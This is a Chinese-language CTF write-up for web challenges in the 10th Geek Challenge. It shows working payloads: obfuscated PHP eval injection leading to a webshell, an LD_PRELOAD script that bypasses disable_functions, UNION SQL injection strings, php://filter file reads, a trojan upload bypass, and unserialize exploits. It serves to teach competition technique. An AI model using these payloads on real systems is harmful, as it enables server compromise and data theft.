<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://114.116.44.23:40001/?code=$&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[_]($&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[__]);&amp;_=assert&amp;__=eval($_GET[a])&amp;a=phpinfo();</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://114.116.44.23:40001/?code=$_="`&#123;&#123;&#123;"^"?&lt;&gt;/";$&#123;$_&#125;[_]($&#123;$_&#125;[__]);&amp;_=assert&amp;__=eval($_GET[a])&amp;a=phpinfo();</span><br></pre></td></tr></table></figure>



<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571497597408.png" alt="1571497597408"></p>
<p>查看某些关键参数</p>
<ul>
<li>​    如系统信息</li>
</ul>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571499066521.png" alt="1571499066521"></p>
<ul>
<li>disable_functions</li>
</ul>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571499768310.png" alt="1571499768310"></p>
<p>命令执行函数都被禁止了</p>
<ul>
<li>allow_url_*</li>
</ul>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571498825445.png" alt="1571498825445"></p>
<p>关于这两个参数可以参考这篇文章<a href="https://www.smi1e.top/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E4%B8%8Ephp%E4%BC%AA%E5%8D%8F%E8%AE%AE/" target="_blank" rel="noopener">php伪协议</a></p>
<ul>
<li>sendmail_*</li>
</ul>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571499021494.png" alt="1571499021494"></p>
<ul>
<li>open_basedir</li>
</ul>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571500306817.png" alt="1571500306817"></p>
<p>并没有限制我们目录。如果有可以参考这篇<a href="https://skysec.top/2019/04/12/%E4%BB%8EPHP%E5%BA%95%E5%B1%82%E7%9C%8Bopen-basedir-bypass/" target="_blank" rel="noopener">文章</a>绕过</p>
<p>既然不能执行命令那就用var_dump(scandir())来查看文件信息</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://114.116.44.23:40001/?code=$&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[_]($&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[__]);&amp;_=assert&amp;__=var_dump(eval($_GET[a]))&amp;a=var_dump(scandir(%27/tmp/%27));</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571501644752.png" alt="1571501644752"></p>
<p>但感觉挺麻烦的，后面队友搞了个这个(躺着真舒服 )，直接蚁剑连(菜刀不行)</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://114.116.44.23:40001/?code=$&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[_]($&#123;%fe%fe%fe%fe^%a1%b9%bb%aa&#125;[__]);&amp;_=assert&amp;__=eval($_POST[%27a%27])</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571502520704.png" alt="1571502520704"></p>
<p>发现主目录下有有flag和readflag，flag只能root才能查看</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571502747158.png" alt="1571502747158"></p>
<p>把readflag下载下来，反编译了一下</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571502795907.png" alt="1571502795907"></p>
<p>那么思路也就清晰起来了，bypass disable_functions  执行readflag</p>
<p>我们这里利用LD_PRELOAD劫持共享库，从而执行命令</p>
<p>具体原理看看<a href="https://www.cnblogs.com/leixiao-/p/10612798.html" target="_blank" rel="noopener">出题人的博客</a>和<a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="noopener">bypass_disablefunc_via_LD_PRELOAD</a></p>
<p>首先上传恶意so文件，上面的github项目中有，注意操作系统位数</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571503296101.png" alt="1571503296101"></p>
<p>并且重命名为123.so</p>
<p>然后上传123.php文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    echo &quot;&lt;p&gt; &lt;b&gt;example&lt;/b&gt;: http://site.com/bypass_disablefunc.php?cmd=pwd&amp;outpath=/tmp/xx&amp;sopath=/var/www/bypass_disablefunc_x64.so &lt;/p&gt;&quot;;</span><br><span class="line"></span><br><span class="line">    $cmd = $_GET[&quot;cmd&quot;];</span><br><span class="line">    $out_path = $_GET[&quot;outpath&quot;];</span><br><span class="line">    $evil_cmdline = $cmd . &quot; &gt; &quot; . $out_path . &quot; 2&gt;&amp;1&quot;;</span><br><span class="line">    echo &quot;&lt;p&gt; &lt;b&gt;cmdline&lt;/b&gt;: &quot; . $evil_cmdline . &quot;&lt;/p&gt;&quot;;</span><br><span class="line"></span><br><span class="line">    putenv(&quot;EVIL_CMDLINE=&quot; . $evil_cmdline);</span><br><span class="line"></span><br><span class="line">    $so_path = $_GET[&quot;sopath&quot;];</span><br><span class="line">    putenv(&quot;LD_PRELOAD=&quot; . $so_path);</span><br><span class="line"></span><br><span class="line">    mail(&quot;&quot;, &quot;&quot;, &quot;&quot;, &quot;&quot;);</span><br><span class="line"></span><br><span class="line">    echo &quot;&lt;p&gt; &lt;b&gt;output&lt;/b&gt;: &lt;br /&gt;&quot; . nl2br(file_get_contents($out_path)) . &quot;&lt;/p&gt;&quot;; </span><br><span class="line"></span><br><span class="line">    unlink($out_path);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>然后通过include()包含文件，执行系统命令</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://114.116.44.23:40001/?code=$_=%22`&#123;&#123;&#123;%22^%22?%3C%3E/%22;$&#123;$_&#125;[_]($&#123;$_&#125;[__]);&amp;_=assert&amp;__=var_dump(eval($_GET[a]))&amp;a=include(%27/tmp/123.php%27);&amp;cmd=./../../../readflag&amp;outpath=/tmp/123.txt&amp;sopath=/tmp/123.so</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571503618681.png" alt="1571503618681"></p>
<h2 id="李三的代码审计笔记第一页：Talk-is-easy-show-me-the-code"><a href="#李三的代码审计笔记第一页：Talk-is-easy-show-me-the-code" class="headerlink" title="李三的代码审计笔记第一页：Talk is easy ,show me the code."></a>李三的代码审计笔记第一页：Talk is easy ,show me the code.</h2><p>访问题目页面，给了源码</p>
<p>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    error_reporting(E_ALL);</span><br><span class="line">    ini_set(<span class="string">"max_execution_time"</span>, <span class="string">"60"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">empty</span>($_GET[<span class="string">"url"</span>]) &amp;&amp; <span class="keyword">die</span>();</span><br><span class="line">    $password = <span class="string">"If I knew where I would die, I would never go there."</span>;</span><br><span class="line">    $arr = explode(<span class="string">' '</span>, $password);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">startsWith</span><span class="params">($haystack, $needle)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">         $length = strlen($needle);</span><br><span class="line">         <span class="keyword">return</span> (substr($haystack, <span class="number">0</span>, $length) === $needle);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $url = $_GET[<span class="string">"url"</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!startsWith($url,<span class="string">"http://"</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Not allow !"</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>($i=<span class="number">0</span>; $i&lt;count($arr); $i++)  </span><br><span class="line">    &#123;</span><br><span class="line">        $ch = curl_init();</span><br><span class="line">        curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, <span class="keyword">FALSE</span>); </span><br><span class="line">        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, <span class="keyword">FALSE</span>); </span><br><span class="line">        curl_setopt($ch, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line">        curl_setopt($ch, CURLOPT_TIMEOUT, <span class="number">3</span>); </span><br><span class="line">        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, <span class="keyword">false</span>);</span><br><span class="line">        $output = curl_exec($ch); </span><br><span class="line">        curl_close($ch);</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> ($output === $arr[$i])</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>($i == sizeof($arr)<span class="number">-1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">"Congratulations. Flag is  SYC&#123;********************************&#125;"</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;   </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"password is wrong"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在具有公网IP的服务器上，放置以下两个文件</p>
<p>req.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$password = <span class="string">"If I knew where I would die, I would never go there."</span>;</span><br><span class="line">$arr = explode(<span class="string">' '</span>, $password);</span><br><span class="line">$count=intval(file_get_contents(<span class="string">"1.txt"</span>));</span><br><span class="line"><span class="keyword">echo</span> $arr[$count];</span><br><span class="line"></span><br><span class="line">$count++;</span><br><span class="line">$file=fopen(<span class="string">"1.txt"</span>,<span class="string">"w+"</span>);</span><br><span class="line">fwrite($file,$count);</span><br><span class="line">fclose($file);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>1.txt</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span></span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101124245849.png" alt="image-20191101124245849"></p>
<p>1.txt要有可写权限</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101124431268.png" alt="image-20191101124431268"></p>
<h2 id="服务端检测系统：emm，自己看"><a href="#服务端检测系统：emm，自己看" class="headerlink" title="服务端检测系统：emm，自己看"></a>服务端检测系统：emm，自己看</h2><h2 id="Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！"><a href="#Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！" class="headerlink" title="Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！"></a>Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！</h2><p>熟悉的界面</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101125127520.png" alt="image-20191101125127520"></p>
<p>同样的手法</p>
<figure class="highlight fix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">‘</span>=<span class="string">’</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">‘=’</span></span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101201215464.png" alt="image-20191101201215464"></p>
<p>但这个字符串并不是flag，估计在数据库中</p>
<p>利用Payload测试，禁用了 insert，having等，可以利用<code>#</code> 闭合。</p>
<p>可以联合注入，报错注入，盲注。</p>
<p>这里用最简单的联合注入。</p>
<p>先判断字段数</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101202502733.png" alt="image-20191101202502733"></p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101202533747.png" alt="image-20191101202533747"></p>
<p>字段数为3</p>
<p>获取回显点</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101203249710.png" alt="image-20191101203249710"></p>
<p>获取数据库名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1%27union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23&amp;password=123</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101203821862.png" alt="image-20191101203821862"></p>
<p>先关注geek数据库，查表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1%27union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema%3d&apos;geek&apos;%23&amp;password=123</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101204140891.png" alt="image-20191101204140891"></p>
<p>查l0ve1ysq1表的字段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1%27union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema%3d&apos;geek&apos;+and+table_name%3d&apos;l0ve1ysq1&apos;%23&amp;password=123</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101204909589.png" alt="image-20191101204909589"></p>
<p>获取数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=1%27union+select+1,2,group_concat(id,username,password)+from+geek.l0ve1ysq1+%23&amp;password=123</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191101213948365.png" alt="image-20191101213948365"></p>
<h2 id="性感黄阿姨，在线聊天-听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！"><a href="#性感黄阿姨，在线聊天-听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！" class="headerlink" title="性感黄阿姨，在线聊天:听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！"></a>性感黄阿姨，在线聊天:听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！</h2><p>bp抓包</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031113746614.png" alt="image-20191031113746614"></p>
<p>尝试把guest改成admin</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031114019083.png" alt="image-20191031114019083"></p>
<p>提示我们要绕过这个判断</p>
<p>两个等号，第一时间想到的是php弱类型</p>
<p>利用字符串和数字的比较弱点</p>
<p>md5加密肯定是个字符串，如果第一个字符是字母转化为数字则为0，如果前两个字符是“1w”，那么转化为数字则为1.</p>
<p>所以我们利用name传输数字，爆破md5($flag)前面的数字即可绕过。</p>
<p>在json中，“name”:”0”是字符串，”name”:0 是数字</p>
<p>配置测试器</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031115415135.png" alt="image-20191031115415135"></p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031115443975.png" alt="image-20191031115443975"></p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031115642982.png" alt="image-20191031115642982"></p>
<p>经过测试不能带<a href="https://4o4notfound.org/index.php/archives/29/" target="_blank" rel="noopener">xml</a>声明，Connect-Type改成xml</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031122255387.png" alt="image-20191031122255387"></p>
<p>利用PHP<a href="https://www.smi1e.top/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E4%B8%8Ephp%E4%BC%AA%E5%8D%8F%E8%AE%AE/" target="_blank" rel="noopener">伪协议</a>和base64加密读取文件内容</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191031124114147.png" alt="image-20191031124114147"></p>
<p>base64解码得到flag</p>
<h2 id="神秘的三叶草"><a href="#神秘的三叶草" class="headerlink" title="神秘的三叶草"></a>神秘的三叶草</h2><p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029215131113.png" alt="image-20191029215131113"></p>
<p>查看源码，发现Secret.php</p>
<p>打开Secret.php</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029215545399.png" alt="image-20191029215545399"></p>
<p>直接BP抓包，修改Referer头</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029220046452.png" alt="image-20191029220046452"></p>
<p>提示使用Syclover浏览器</p>
<p>修改UA头</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029220217949.png" alt="image-20191029220217949"></p>
<p>接着提示只能本地读取</p>
<p>修改XFF头</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029220337766.png" alt="image-20191029220337766"></p>
<p>得到flag</p>
<h2 id="Jiang‘s-Secret-我在那放了一个秘密！"><a href="#Jiang‘s-Secret-我在那放了一个秘密！" class="headerlink" title="Jiang‘s Secret:我在那放了一个秘密！"></a>Jiang‘s Secret:我在那放了一个秘密！</h2><p>打开主页</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231444787.png" alt="image-20191029231444787"></p>
<p>查看源码</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231426639.png" alt="image-20191029231426639"></p>
<p>访问Archive_room.php</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231626206.png" alt="image-20191029231626206"></p>
<p>点击SECRET</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231659829.png" alt="image-20191029231659829"></p>
<p>尝试BP抓包</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231743833.png" alt="image-20191029231743833"></p>
<p>访问secr3t.php</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029231920584.png" alt="image-20191029231920584"></p>
<p>简单的代码审计</p>
<p>直接file=flag.php</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029232108090.png" alt="image-20191029232108090"></p>
<p>无法直接读取flag.php文件</p>
<p>利用php伪协议</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029232338502.png" alt="image-20191029232338502"></p>
<p>base64解码</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191029232357758.png" alt="image-20191029232357758"></p>
<h2 id="你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ"><a href="#你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ" class="headerlink" title="你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ=="></a>你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ==</h2><p>上传正常的图片</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191030232940824.png" alt="image-20191030232940824"></p>
<p>Not image！</p>
<p>尝试修改Content-Type</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191030233157391.png" alt="image-20191030233157391"></p>
<p>上传成功，但并没有返回文件路径</p>
<p>盲猜一波upload</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191030233348553.png" alt="image-20191030233348553"></p>
<p>正确</p>
<p>尝试上传一句话木马</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191030233555540.png" alt="image-20191030233555540"></p>
<p>尝试改后缀</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/image-20191030233648512.png" alt="image-20191030233648512"></p>
<p>phtml可绕过 但不能出现&lt;?</p>
<p>利用<script language="php">绕过</p>
<p><img src="image-20191030233844611.png" alt="image-20191030233844611"></p>
<p>上传成功</p>
<p>菜刀 连上</p>
<p><img src="image-20191030234008757.png" alt="image-20191030234008757"></p>
<p><img src="image-20191030234111964.png" alt="image-20191030234111964"></p>
<h2 id="反序列化1-0-socre10000拿到flag"><a href="#反序列化1-0-socre10000拿到flag" class="headerlink" title="反序列化1.0 : socre10000拿到flag"></a>反序列化1.0 : socre10000拿到flag</h2><p>F12查看源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Student</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $score = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"__destruct working"</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;score==<span class="number">10000</span>) &#123;</span><br><span class="line">            $flag = <span class="string">"******************"</span>;</span><br><span class="line">            <span class="keyword">echo</span> $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$exp = $_GET[<span class="string">'exp'</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">unserialize($exp);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>利用反序列化漏洞，使score的值改成10000获得flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Student</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $score = <span class="number">10000</span>;</span><br><span class="line">&#125;</span><br><span class="line">    $Student = <span class="keyword">new</span> Student();</span><br><span class="line">    <span class="keyword">echo</span> serialize($Student); </span><br><span class="line">    </span><br><span class="line">    <span class="meta">?&gt;</span></span><br><span class="line">    <span class="comment">//O:7:"Student":1:&#123;s:5:"score";i:10000;&#125;</span></span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span><span class="number">148.70</span>.<span class="number">59.198</span>:<span class="number">42374</span>/?<span class="keyword">exp</span>=O:<span class="number">7</span>:%22Student%22:<span class="number">1</span>:&#123;<span class="keyword">s</span>:<span class="number">5</span>:%22score%22;i:<span class="number">10000</span>;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="image-20191103221650185.png" alt="image-20191103221650185"></p>
<p><a href="https://www.freebuf.com/news/172507.html">参考文章1</a></p>
<h2 id="你有初恋吗：你变心了吗"><a href="#你有初恋吗：你变心了吗" class="headerlink" title="你有初恋吗：你变心了吗"></a>你有初恋吗：你变心了吗</h2><p>打开题目<a href="http://cxc.design/53a5734d6c99f89a/">链接</a></p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106163009923.png" alt="image-20191106163009923"></p>
<p>F12查看源码</p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106163100753.png" alt="image-20191106163100753"></p>
<p>明显是hash扩展字节攻击</p>
<p>利用BP抓包</p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106163553918.png" alt="image-20191106163553918"></p>
<p>得到Heart的值：<code>6a1ce5f4dc83320710006a786ac82c17</code></p>
<p>利用hashpump得到lover</p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106163932674.png" alt="image-20191106163932674"></p>
<p>将得到的字符串进行url编码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;php</span><br><span class="line">$str=<span class="string">"syclover\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00nb"</span>;</span><br><span class="line">var_dump(urlencode($str));<span class="comment">//syclover%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%B8%00%00%00%00%00%00%00nb</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>将Heart的值修改成<code>2399f812e1a15732dcaadef365b71c19</code> 提交lover</p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106164815760.png" alt="image-20191106164815760"></p>
<p>后面看了LiM的文章，枯了。</p>
<p>双URL编码绕过，直接POST提交  <code>lover=syclove%2572</code> 得到flag。</p>
<p>思路太局限了。。。</p>
<p><a href="https://www.freebuf.com/articles/web/31756.html">参考文章1</a></p>
<p><a href="https://www.freebuf.com/articles/database/164019.html">参考文章2</a></p>
<h2 id="又来一只猫-我家猫名字叫php"><a href="#又来一只猫-我家猫名字叫php" class="headerlink" title="又来一只猫: 我家猫名字叫php"></a>又来一只猫: 我家猫名字叫php</h2><p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106232809806.png" alt="image-20191106232809806"></p>
<p>推测应该存在备份文件，盲猜<a href="http://www.zip">www.zip</a></p>
<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106232905931.png" alt="image-20191106232905931"></p>
<p>下载后解压，index.php中接受select参数并反序列化。</p>
<p>查看class.php</p>
<p>根据 <code>__destruct()</code>函数 反序列化要使$username=admin,$password=100.</p>
<p>但有个问题要绕过 <code>__wakeup()</code> ,这里可以利用 CVE-2016-7124漏洞，<strong>当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行</strong> </p>
